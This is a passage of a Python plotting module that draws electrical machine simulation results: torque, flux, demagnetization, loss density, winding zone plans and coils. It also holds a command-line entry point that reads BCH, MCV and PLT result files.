        # rotating machine: torque and force components vs angle
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        torque_fft(bch.torque_fft[-1]['order'], bch.torque_fft[-1]['torque'])
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        # linear machine: forces vs displacement
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos, [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos, [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except Exception:  # was a bare except; don't swallow SystemExit etc.
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except Exception:  # was a bare except
            pass
    fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def cogging(bch, title=''):
    """creates a cogging plot

    Args:
      bch: BCH reader object with torque/linearForce and flux results
      title: optional figure title
    """
    cols = 2
    rows = 3

    # extra vertical space for the suptitle
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    # subplots are filled sequentially through the pyplot state machine,
    # so the call order below matters
    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        # rotating machine: torque, torque harmonics, Fx and Fy
        torque(bch.torque[0]['angle'], bch.torque[0]['torque'])
        plt.subplot(rows, cols, row+1)
        if bch.torque_fft:
            torque_fft(bch.torque_fft[0]['order'], bch.torque_fft[0]['torque'])
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[0]['angle'], bch.torque[0]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[0]['angle'], bch.torque[0]['force_y'])
        row += 3
    elif bch.linearForce:
        # linear machine: two force components and their harmonics
        # NOTE(review): this rebinds the title argument to the force titles
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    # voltage of winding '1' at the first computed position
    plt.subplot(rows, cols, row+1)
    voltage('Voltage',
            bch.flux['1'][0]['displ'],
            bch.flux['1'][0]['voltage_dpsi'])
    plt.subplot(rows, cols, row+2)
    voltage_fft('Voltage Harmonics',
                bch.flux_fft['1'][0]['order'],
                bch.flux_fft['1'][0]['voltage'])

    fig.tight_layout(h_pad=2)
    if title:
        # leave room for the suptitle
        fig.subplots_adjust(top=0.92)


def transientsc(bch, title=''):
    """creates a transient short circuit plot"""
    nrows, ncols = 2, 1
    extra = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=nrows, ncols=ncols,
                           figsize=(10, 3*nrows + extra))
    if title:
        fig.suptitle(title, fontsize=16)

    # phase currents over time
    plt.subplot(nrows, ncols, 1)
    axes = plt.gca()
    axes.set_title('Currents / A')
    axes.grid(True)
    for phase in ('ia', 'ib', 'ic'):
        axes.plot(bch.scData['time'], bch.scData[phase], label=phase)
    axes.set_xlabel('Time / s')
    axes.legend()

    # torque over time
    plt.subplot(nrows, ncols, 2)
    axes = plt.gca()
    axes.set_title('Torque / Nm')
    axes.grid(True)
    axes.plot(bch.scData['time'], bch.scData['torque'])
    axes.set_xlabel('Time / s')

    fig.tight_layout(h_pad=2)
    if title:
        fig.subplots_adjust(top=0.92)


def i1beta_torque(i1, beta, torque, title='', ax=0):
    """creates a surface plot of torque vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    # viewing azimuth depends on the beta range
    b_avg = np.mean(beta)
    view_azim = -60 if (b_avg > 0 or b_avg < -90) else 210
    # auto-scale to kNm for large torques
    scale, unit = 1, 'Nm'
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale, unit = 1e-3, 'kNm'
    zlabel = title if title else u'Torque/{}'.format(unit)
    _plot_surface(ax, i1, beta, scale*np.asarray(torque),
                  (u'I1/A', u'Beta/°', zlabel),
                  azim=view_azim)


def i1beta_ld(i1, beta, ld, ax=0):
    """creates a surface plot of ld vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    ld_mh = 1e3*np.asarray(ld)  # H -> mH
    _plot_surface(ax, i1, beta, ld_mh,
                  (u'I1/A', u'Beta/°', u'Ld/mH'), azim=60)


def i1beta_lq(i1, beta, lq, ax=0):
    """creates a surface plot of lq vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    b_avg = np.mean(beta)
    view_azim = -120 if (b_avg > 0 or b_avg < -90) else 60
    lq_mh = 1e3*np.asarray(lq)  # H -> mH
    _plot_surface(ax, i1, beta, lq_mh,
                  (u'I1/A', u'Beta/°', u'Lq/mH'),
                  azim=view_azim)


def i1beta_psim(i1, beta, psim, ax=0):
    """creates a surface plot of psim vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    labels = (u'I1/A', u'Beta/°', u'Psi m/Vs')
    _plot_surface(ax, i1, beta, psim, labels, azim=60)


def i1beta_up(i1, beta, up, ax=0):
    """creates a surface plot of up vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    labels = (u'I1/A', u'Beta/°', u'Up/V')
    _plot_surface(ax, i1, beta, up, labels, azim=60)


def i1beta_psid(i1, beta, psid, ax=0):
    """creates a surface plot of psid vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    b_avg = np.mean(beta)
    view_azim = 60 if (b_avg > 0 or b_avg < -90) else -60
    _plot_surface(ax, i1, beta, psid,
                  (u'I1/A', u'Beta/°', u'Psi d/Vs'),
                  azim=view_azim)


def i1beta_psiq(i1, beta, psiq, ax=0):
    """creates a surface plot of psiq vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    b_avg = np.mean(beta)
    view_azim = -60 if (b_avg > 0 or b_avg < -90) else 210
    _plot_surface(ax, i1, beta, psiq,
                  (u'I1/A', u'Beta/°', u'Psi q/Vs'),
                  azim=view_azim)


def idq_torque(id, iq, torque, ax=0):
    """creates a surface plot of torque vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    # auto-scale to kNm for large torques
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale, unit = 1e-3, 'kNm'
    else:
        scale, unit = 1, 'Nm'
    _plot_surface(ax, id, iq, scale*np.asarray(torque),
                  (u'Id/A', u'Iq/A', u'Torque/{}'.format(unit)),
                  azim=-60)
    return ax


def idq_psid(id, iq, psid, ax=0):
    """creates a surface plot of psid vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    labels = (u'Id/A', u'Iq/A', u'Psi d/Vs')
    _plot_surface(ax, id, iq, psid, labels, azim=210)


def idq_psiq(id, iq, psiq, ax=0):
    """creates a surface plot of psiq vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    labels = (u'Id/A', u'Iq/A', u'Psi q/Vs')
    _plot_surface(ax, id, iq, psiq, labels, azim=210)


def idq_psim(id, iq, psim, ax=0):
    """creates a surface plot of psim vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    labels = (u'Id/A', u'Iq/A', u'Psi m [Vs]')
    _plot_surface(ax, id, iq, psim, labels, azim=120)


def idq_ld(id, iq, ld, ax=0):
    """creates a surface plot of ld vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    ld_mh = 1e3*np.asarray(ld)  # H -> mH
    _plot_surface(ax, id, iq, ld_mh,
                  (u'Id/A', u'Iq/A', u'L d/mH'), azim=120)


def idq_lq(id, iq, lq, ax=0):
    """creates a surface plot of lq vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    lq_mh = 1e3*np.asarray(lq)  # H -> mH
    _plot_surface(ax, id, iq, lq_mh,
                  (u'Id/A', u'Iq/A', u'L q/mH'), azim=120)


def ldlq(bch):
    """creates the surface plots of a BCH reader object
    with a ld-lq identification

    Args:
      bch: BCH reader object providing an ldq result dict
    """
    beta = bch.ldq['beta']
    i1 = bch.ldq['i1']
    torque = bch.ldq['torque']
    ld = np.array(bch.ldq['ld'])
    lq = np.array(bch.ldq['lq'])
    psid = bch.ldq['psid']
    psiq = bch.ldq['psiq']

    rows = 3
    fig = plt.figure(figsize=(10, 4*rows))
    fig.suptitle('Ld-Lq Identification {}'.format(bch.filename), fontsize=16)
    fig.add_subplot(rows, 2, 1, projection='3d')
    i1beta_torque(i1, beta, torque)

    fig.add_subplot(rows, 2, 2, projection='3d')
    i1beta_psid(i1, beta, psid)

    fig.add_subplot(rows, 2, 3, projection='3d')
    i1beta_psiq(i1, beta, psiq)

    fig.add_subplot(rows, 2, 4, projection='3d')
    # narrowed from a bare except: the intended fallback condition is a
    # missing 'psim' key in the ldq dict
    try:
        i1beta_psim(i1, beta, bch.ldq['psim'])
    except KeyError:
        i1beta_up(i1, beta, bch.ldq['up'])

    fig.add_subplot(rows, 2, 5, projection='3d')
    i1beta_ld(i1, beta, ld)

    fig.add_subplot(rows, 2, 6, projection='3d')
    i1beta_lq(i1, beta, lq)


def psidq(bch):
    """creates the surface plots of a BCH reader object
    with a psid-psiq identification"""
    cur_d = bch.psidq['id']
    cur_q = bch.psidq['iq']
    torque = bch.psidq['torque']
    ld = np.array(bch.psidq_ldq['ld'])
    lq = np.array(bch.psidq_ldq['lq'])
    psim = bch.psidq_ldq['psim']
    psid = bch.psidq['psid']
    psiq = bch.psidq['psiq']

    rows = 3
    fig = plt.figure(figsize=(10, 4*rows))
    fig.suptitle('Psid-Psiq Identification {}'.format(
        bch.filename), fontsize=16)

    # one 3d panel per quantity, laid out in a 3x2 grid
    panels = (idq_torque, idq_psid, idq_psiq, idq_psim, idq_ld, idq_lq)
    values = (torque, psid, psiq, psim, ld, lq)
    for num, (plot, val) in enumerate(zip(panels, values), start=1):
        fig.add_subplot(rows, 2, num, projection='3d')
        plot(cur_d, cur_q, val)


def felosses(losses, coeffs, title='', log=True, ax=0):
    """plot iron losses with steinmetz or jordan approximation
    Args:
      losses: dict with f, B, pfe values
      coeffs: list with steinmetz (cw, alpha, beta) or
              jordan (cw, alpha, ch, beta, gamma) coeffs
      title: title string
      log: log scale for x and y axes if True
      ax: matplotlib axis (current axis if 0)
    """
    import femagtools.losscoeffs as lc
    if ax == 0:
        ax = plt.gca()

    fo = losses['fo']
    Bo = losses['Bo']
    # use numpy directly; the former plt.np alias was removed from
    # matplotlib.pyplot in modern matplotlib releases
    B = np.linspace(0.9*np.min(losses['B']),
                    1.1*0.9*np.max(losses['B']))

    for i, f in enumerate(losses['f']):
        # drop empty/zero entries of the measured losses
        pfe = [p for p in np.array(losses['pfe'])[i] if p]
        if f > 0:
            if len(coeffs) == 5:
                ax.plot(B, lc.pfe_jordan(f, B, *coeffs, fo=fo, Bo=Bo))
            elif len(coeffs) == 3:
                ax.plot(B, lc.pfe_steinmetz(f, B, *coeffs, fo=fo, Bo=Bo))
        plt.plot(losses['B'][:len(pfe)], pfe,
                 marker='o', label="{} Hz".format(f))

    ax.set_title("Fe Losses/(W/kg) " + title)
    if log:
        ax.set_yscale('log')
        ax.set_xscale('log')
    ax.set_xlabel("Flux Density [T]")
    # plt.ylabel("Pfe [W/kg]")
    ax.legend()
    ax.grid(True)


def spel(isa, with_axis=False, ax=0):
    """plot super elements of I7/ISA7 model
    Args:
      isa: Isa7 object
    """
    from matplotlib.patches import Polygon
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    # one filled polygon per superelement, colored by its color index
    for sel in isa.superelements:
        outline = [nd.xy
                   for chain in sel.nodechains
                   for nd in chain.nodes]
        ax.add_patch(Polygon(outline, color=isa.color[sel.color], lw=0))

    ax.autoscale(enable=True)
    if not with_axis:
        ax.axis('off')


def mesh(isa, with_axis=False, ax=0):
    """plot mesh of I7/ISA7 model
    Args:
      isa: Isa7 object
    """
    from matplotlib.lines import Line2D
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    # draw the outline of every element as a thin blue line
    for el in isa.elements:
        xs = [v.xy[0] for v in el.vertices]
        ys = [v.xy[1] for v in el.vertices]
        ax.add_line(Line2D(xs, ys, color='b', ls='-', lw=0.25))

    ax.autoscale(enable=True)
    if not with_axis:
        ax.axis('off')


def _contour(ax, title, elements, values, label='', isa=None):
    """filled contour plot of per-element scalar values over a mesh

    Args:
      ax: matplotlib axis (current axis if 0)
      title: plot title
      elements: mesh elements, each with a vertices attribute
      values: one scalar per element; NaN entries are drawn white
      label: optional colorbar label
      isa: optional Isa7 model whose superelements are drawn as a
        gray background outline
    """
    from matplotlib.patches import Polygon
    from matplotlib.collections import PatchCollection
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    ax.set_title(title, fontsize=18)
    if isa:
        # faint machine outline behind the contour
        for se in isa.superelements:
            ax.add_patch(Polygon([n.xy
                                  for nc in se.nodechains
                                  for n in nc.nodes],
                                 color='gray', alpha=0.1, lw=0))
    # color only elements with a defined (non-NaN) value
    valid_values = np.logical_not(np.isnan(values))
    patches = np.array([Polygon([v.xy for v in e.vertices])
                       for e in elements])[valid_values]
    # , cmap=matplotlib.cm.jet, alpha=0.4)
    p = PatchCollection(patches, alpha=1.0, match_original=False)
    p.set_array(np.asarray(values)[valid_values])
    ax.add_collection(p)
    cb = plt.colorbar(p)
    # cover NaN elements with opaque white patches
    for patch in np.array([Polygon([v.xy for v in e.vertices],
                                   fc='white', alpha=1.0)
                           for e in elements])[np.isnan(values)]:
        ax.add_patch(patch)
    if label:
        cb.set_label(label=label, fontsize=18)
    ax.autoscale(enable=True)
    ax.axis('off')


def demag(isa, ax=0):
    """plot demag of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
    """
    magnets = [e for e in isa.elements if e.is_magnet()]
    hdemag = np.array([e.demagnetization(isa.MAGN_TEMPERATURE)
                       for e in magnets])
    _contour(ax, f'Demagnetization at {isa.MAGN_TEMPERATURE} °C',
             magnets, hdemag, '-H / kA/m', isa)
    logger.info("Max demagnetization %f", np.max(hdemag))


def demag_pos(isa, pos, icur=-1, ibeta=-1, ax=0):
    """plot demag of NC/I7/ISA7 model at rotor position
    Args:
      isa: Isa7/NC object
      pos: rotor position in degree
      icur: cur amplitude index or last index if -1
      ibeta: beta angle index or last index if -1
    """
    emag = [e for e in isa.elements if e.is_magnet()]
    demag = np.array([isa.demagnetization(e, icur, ibeta)[1]
                     for e in emag])
    # find the first stored position >= pos (pos is in degrees,
    # isa.pos_el_fe_induction presumably in radians — the comparison
    # converts pos); i and x intentionally leak out of the loop
    for i, x in enumerate(isa.pos_el_fe_induction):
        if x >= pos/180*np.pi:
            break

    # demagnetization of all magnet elements at that position;
    # zeros (no data) are masked as NaN so _contour draws them white
    hpol = demag[:, i]
    hpol[hpol == 0] = np.nan
    _contour(ax, f'Demagnetization at Pos. {round(x/np.pi*180)}° ({isa.MAGN_TEMPERATURE} °C)',
             emag, hpol, '-H / kA/m', isa)
    logger.info("Max demagnetization %f kA/m", np.nanmax(hpol))


def flux_density(isa, subreg=[], ax=0):
    """plot flux density of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
      subreg: name or list of names of subregions to restrict the plot to
      ax: matplotlib axis (current axis if 0)
    """
    if subreg:
        if isinstance(subreg, list):
            sr = subreg
        else:
            sr = [subreg]
        elements = [e for s in sr for se in isa.get_subregion(s).elements()
                    for e in se]
    else:
        # plain copy instead of an identity comprehension
        elements = list(isa.elements)

    fluxd = np.array([np.linalg.norm(e.flux_density()) for e in elements])
    # plain string literal: the former f-string had no placeholders
    _contour(ax, 'Flux Density T', elements, fluxd)
    logger.info("Max flux dens %f", np.max(fluxd))


def loss_density(isa, subreg=[], ax=0):
    """plot loss density of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
    """
    if subreg:
        # accept a single name or a list of names
        names = subreg if isinstance(subreg, list) else [subreg]
        elements = [e for name in names
                    for group in isa.get_subregion(name).elements()
                    for e in group]
    else:
        elements = [e for e in isa.elements]

    # W/m³ -> kW/m³
    lossd = np.array([e.loss_density*1e-3 for e in elements])
    _contour(ax, 'Loss Density kW/m³', elements, lossd)


def mmf(f, title='', ax=0):
    """plot magnetomotive force (mmf) of winding

    Args:
      f: dict with pos, mmf, pos_fft, mmf_fft and alfa0 entries
        (positions in radians)
      title: optional axis title
      ax: matplotlib axis (current axis if 0)
    """
    if ax == 0:
        ax = plt.gca()
    if title:
        ax.set_title(title)
    ax.plot(np.array(f['pos'])/np.pi*180, f['mmf'])
    ax.plot(np.array(f['pos_fft'])/np.pi*180, f['mmf_fft'])
    ax.set_xlabel('Position / Deg')

    # mark the winding axis angle alfa0 with a dashed vertical line
    phi = [f['alfa0']/np.pi*180, f['alfa0']/np.pi*180]
    y = [min(f['mmf_fft']), 1.1*max(f['mmf_fft'])]
    ax.plot(phi, y, '--')
    alfa0 = round(f['alfa0']/np.pi*180, 3)
    ax.text(phi[0]/2, y[0]+0.05, f"{alfa0}°",
            ha="center", va="bottom")
    # arrow from the origin to the alfa0 line (plain string: the former
    # f-string prefix on the empty label served no purpose)
    ax.annotate("", xy=(phi[0], y[0]),
                xytext=(0, y[0]), arrowprops=dict(arrowstyle="->"))
    ax.grid()


def mmf_fft(f, title='', mmfmin=1e-2, ax=0):
    """plot winding mmf harmonics

    Args:
      f: dict with nue (harmonic orders) and mmf_nue (amplitudes)
      title: optional axis title
      mmfmin: amplitudes below this threshold are not plotted
      ax: matplotlib axis (current axis if 0)
    """
    if ax == 0:
        ax = plt.gca()
    if title:
        ax.set_title(title)
    else:
        ax.set_title('MMF Harmonics')
    ax.grid(True)
    harmonics = [(n, m) for n, m in zip(f['nue'],
                                        f['mmf_nue']) if m > mmfmin]
    try:
        # unpacking an empty array also raises ValueError, so it must be
        # inside the try (the previous code unpacked outside and crashed
        # when no harmonic exceeded mmfmin)
        order, mmf = np.array(harmonics).T
        ax.stem(order, mmf, '-.', basefmt=" ",
                use_line_collection=True)
        ax.set_xticks(order)
    except ValueError:  # empty sequence
        pass


def zoneplan(wdg, ax=0):
    """plot zone plan of winding wdg

    Args:
      wdg: winding object (provides zoneplan(), Q, p, q)
      ax: matplotlib axis (current axis if 0)
    """
    from matplotlib.patches import Rectangle
    upper, lower = wdg.zoneplan()
    # number of slots in the base winding
    Qb = len([n for l in upper for n in l])
    from femagtools.windings import coil_color
    # rectangle height of one layer
    rh = 0.5
    if lower:
        yl = rh
        ymax = 2*rh + 0.2
    else:
        yl = 0
        ymax = rh + 0.2
    if ax == 0:
        ax = plt.gca()
    ax.axis('off')
    ax.set_xlim([-0.5, Qb-0.5])
    ax.set_ylim([0, ymax])
    ax.set_aspect(Qb/6+0.3)

    # upper layer: one colored cell per slot, labeled +/- phase number
    for i, p in enumerate(upper):
        for x in p:
            ax.add_patch(Rectangle((abs(x)-1.5, yl), 1, rh,
                                   facecolor=coil_color[i],
                                   edgecolor='white', fill=True))
            s = f'+{i+1}' if x > 0 else f'-{i+1}'
            ax.text(abs(x)-1, yl+rh/2, s, color='black',
                    ha="center", va="center")
    # lower layer (only non-empty for two-layer windings)
    for i, p in enumerate(lower):
        for x in p:
            ax.add_patch(Rectangle((abs(x)-1.5, yl-rh), 1, rh,
                                   facecolor=coil_color[i],
                                   edgecolor='white', fill=True))
            s = f'+{i+1}' if x > 0 else f'-{i+1}'
            ax.text(abs(x)-1, yl-rh/2, s, color='black',
                    ha="center", va="center")

    yu = yl+rh
    # label every slot, or every second slot for large windings
    step = 1 if Qb < 25 else 2
    if lower:
        yl -= rh
    margin = 0.05
    ax.text(-0.5, yu+margin, f'Q={wdg.Q}, p={wdg.p}, q={round(wdg.q,4)}',
            ha='left', va='bottom', size=15)
    for i in range(0, Qb, step):
        ax.text(i, yl-margin, f'{i+1}', ha="center", va="top")


def winding_factors(wdg, n=8, ax=0):
    """plot winding factors (pitch, distribution, total)

    Args:
      wdg: winding object (provides kw_order, kwp, kwd, kw, Q, p, q)
      n: number of harmonics to consider
      ax: matplotlib axis (current axis if 0)
    """
    # honor the ax argument (was unconditionally plt.gca(), which
    # silently ignored a caller-supplied axis)
    if ax == 0:
        ax = plt.gca()
    ax.set_title(f'Winding factors Q={wdg.Q}, p={wdg.p}, q={round(wdg.q,4)}')
    ax.grid(True)
    order, kwp, kwd, kw = np.array([(nu, k1, k2, k3)
                                    for nu, k1, k2, k3 in zip(wdg.kw_order(n),
                                                              wdg.kwp(n),
                                                              wdg.kwd(n),
                                                              wdg.kw(n))]).T
    try:
        # stems slightly offset so the three factor sets stay readable
        ax.stem(order-1, kwp, 'C1:', basefmt=" ", markerfmt='C1.',
                use_line_collection=True, label='Pitch')
        ax.stem(order+1, kwd, 'C2:', basefmt=" ", markerfmt='C2.',
                use_line_collection=True, label='Distribution')
        ax.stem(order, kw, 'C0-', basefmt=" ", markerfmt='C0o',
                use_line_collection=True, label='Total')
        ax.set_xticks(order)
        ax.legend()
    except ValueError:  # empty sequence
        pass


def winding(wdg, ax=0):
    """plot coils of windings wdg

    Args:
      wdg: winding object (provides zoneplan(), yd, Q, p, m, l)
      ax: matplotlib axis (current axis if 0)
    """
    from matplotlib.patches import Rectangle
    from matplotlib.lines import Line2D
    from femagtools.windings import coil_color

    # drawing constants in arbitrary plot units
    coil_len = 25
    coil_height = 4
    dslot = 8
    arrow_head_length = 2
    arrow_head_width = 2

    if ax == 0:
        ax = plt.gca()
    z = wdg.zoneplan()
    xoff = 0
    if z[-1]:
        # two-layer winding: offset the layers horizontally
        xoff = 0.75
    # coil pitch in drawing units
    yd = dslot*wdg.yd
    mh = 2*coil_height/yd
    slots = sorted([abs(n) for m in z[0] for n in m])
    smax = slots[-1]*dslot
    # draw the slots with their numbers
    for n in slots:
        x = n*dslot
        ax.add_patch(Rectangle((x + dslot/4, 1), dslot /
                     2, coil_len - 2, fc="lightblue"))
        ax.text(x, coil_len / 2,
                str(n),
                horizontalalignment="center",
                verticalalignment="center",
                backgroundcolor="white",
                bbox=dict(boxstyle='circle,pad=0', fc="white", lw=0))
    line_thickness = [0.6, 1.2]
    # draw the coil sides of each layer and phase
    for i, layer in enumerate(z):
        b = -xoff if i else xoff
        lw = line_thickness[i]
        for m, mslots in enumerate(layer):
            for k in mslots:
                x = abs(k) * dslot + b
                xpoints = []
                ypoints = []
                if (i == 0 and (k > 0 or (k < 0 and wdg.l > 1))):
                    # first layer, positive dir or neg. dir and 2-layers:
                    #   from right bottom
                    if x + yd > smax+b:
                        dx = dslot if yd > dslot else yd/4
                        xpoints = [x + yd//2 + dx - xoff]
                        ypoints = [-coil_height + mh*dx]
                    xpoints += [x + yd//2 - xoff, x, x, x + yd//2-xoff]
                    ypoints += [-coil_height, 0, coil_len,
                                coil_len+coil_height]
                    if x + yd > smax+b:
                        xpoints += [x + yd//2 + dx - xoff]
                        ypoints += [coil_len+coil_height - mh*dx]
                else:
                    # from left bottom
                    if x - yd < 0:  # and x - yd/2 > -3*dslot:
                        dx = dslot if yd > dslot else yd/4
                        xpoints = [x - yd//2 - dx + xoff]
                        ypoints = [- coil_height + mh*dx]
                    xpoints += [x - yd//2+xoff, x, x, x - yd/2+xoff]
                    ypoints += [-coil_height, 0, coil_len,
                                coil_len+coil_height]
                    if x - yd < 0:  # and x - yd > -3*dslot:
                        xpoints += [x - yd//2 - dx + xoff]
                        ypoints += [coil_len + coil_height - mh*dx]

                ax.add_line(Line2D(xpoints, ypoints,
                            color=coil_color[m], lw=lw))

                # current direction arrow: up for positive coil sides,
                # down for negative ones
                if k > 0:
                    h = arrow_head_length
                    y = coil_len * 0.8
                else:
                    h = -arrow_head_length
                    y = coil_len * 0.2
                ax.arrow(x, y, 0, h,
                         length_includes_head=True,
                         head_starts_at_zero=False,
                         head_length=arrow_head_length,
                         head_width=arrow_head_width,
                         fc=coil_color[m], lw=0)
    if False:  # TODO show winding connections
        m = 0
        for k in [n*wdg.Q/wdg.p/wdg.m + 1 for n in range(wdg.m)]:
            if k < len(slots):
                x = k * dslot + b + yd/2 - xoff
                ax.add_line(Line2D([x, x],
                                   [-2*coil_height, -coil_height],
                                   color=coil_color[m], lw=lw))
                ax.text(x, -2*coil_height+0.5, str(m+1), color=coil_color[m])
            m += 1
    ax.autoscale(enable=True)
    ax.set_axis_off()


def main():
    """CLI entry point: read a BCH/BATCH/PLT/MCV file and show its plots

    Raises:
      ValueError: if the BCH calculation type is not supported
    """
    import io
    import sys
    import argparse
    from .__init__ import __version__
    from femagtools.bch import Reader

    argparser = argparse.ArgumentParser(
        description='Read BCH/BATCH/PLT file and create a plot')
    argparser.add_argument('filename',
                           help='name of BCH/BATCH/PLT file')
    argparser.add_argument(
        "--version",
        "-v",
        action="version",
        version="%(prog)s {}, Python {}".format(__version__, sys.version),
        help="display version information",
    )
    args = argparser.parse_args()
    if not matplotlibversion:
        sys.exit(0)
    if not args.filename:
        sys.exit(0)

    ext = args.filename.split('.')[-1].upper()
    if ext.startswith('MC'):
        import femagtools.mcv
        # use the parsed argument (was sys.argv[1], which breaks when
        # main() is invoked programmatically or with extra options)
        mcv = femagtools.mcv.read(args.filename)

        if mcv['mc1_type'] in (femagtools.mcv.MAGCRV, femagtools.mcv.ORIENT_CRV):
            ncols = 2
        else:  # Permanent Magnet
            ncols = 1

        fig, ax = plt.subplots(nrows=1, ncols=ncols, figsize=(10, 6))
        if ncols > 1:
            plt.subplot(1, 2, 1)
            mcv_hbj(mcv)
            plt.subplot(1, 2, 2)
            mcv_muer(mcv)
        else:
            mcv_hbj(mcv, log=False)

        fig.tight_layout()
        fig.subplots_adjust(top=0.94)
        plt.show()
        return

    if ext.startswith('PLT'):
        import femagtools.forcedens
        fdens = femagtools.forcedens.read(args.filename)
        cols = 1
        rows = 2
        fig, ax = plt.subplots(nrows=rows, ncols=cols,
                               figsize=(10, 10*rows))
        title = '{}, Rotor position {}'.format(
            fdens.title, fdens.positions[0]['position'])
        pos = fdens.positions[0]['X']
        FT_FN = (fdens.positions[0]['FT'],
                 fdens.positions[0]['FN'])
        plt.subplot(rows, cols, 1)
        forcedens(title, pos, FT_FN)

        title = 'Force Density Harmonics'
        plt.subplot(rows, cols, 2)
        forcedens_fft(title, fdens)

        # fig.tight_layout(h_pad=3.5)
        # if title:
        #    fig.subplots_adjust(top=0.92)
        plt.show()
        return

    # default: BCH/BATCH file; dispatch on the calculation type string
    bchresults = Reader()
    with io.open(args.filename, encoding='latin1', errors='ignore') as f:
        bchresults.read(f.readlines())

    if (bchresults.type.lower().find(
        'pm-synchronous-motor simulation') >= 0 or
        bchresults.type.lower().find(
            'permanet-magnet-synchronous-motor') >= 0 or
        bchresults.type.lower().find(
            'simulation pm/universal-motor') >= 0):
        pmrelsim(bchresults, bchresults.filename)
    elif bchresults.type.lower().find(
            'multiple calculation of forces and flux') >= 0:
        multcal(bchresults, bchresults.filename)
    elif bchresults.type.lower().find('cogging calculation') >= 0:
        cogging(bchresults, bchresults.filename)
    elif bchresults.type.lower().find('ld-lq-identification') >= 0:
        ldlq(bchresults)
    elif bchresults.type.lower().find('psid-psiq-identification') >= 0:
        psidq(bchresults)
    elif bchresults.type.lower().find('fast_torque calculation') >= 0:
        fasttorque(bchresults)
    elif bchresults.type.lower().find('transient sc') >= 0:
        transientsc(bchresults, bchresults.filename)
    else:
        raise ValueError("BCH type {} not yet supported".format(
            bchresults.type))
    plt.show()


def characteristics(char, title=''):
    """plot the speed characteristics of a machine in a 2x2 grid

    Args:
      char: dict with arrays n, T, pmech, u1, cosphi, i1, plfe, plcu,
        losses, eta and optionally id, iq, beta
      title: optional figure title
    """
    fig, axs = plt.subplots(2, 2, figsize=(10, 8), sharex=True)
    if title:
        fig.suptitle(title)

    # speed in rpm, mechanical power in kW
    n = np.array(char['n'])*60
    pmech = np.array(char['pmech'])*1e-3

    # top left: torque with mechanical power on a twin y-axis
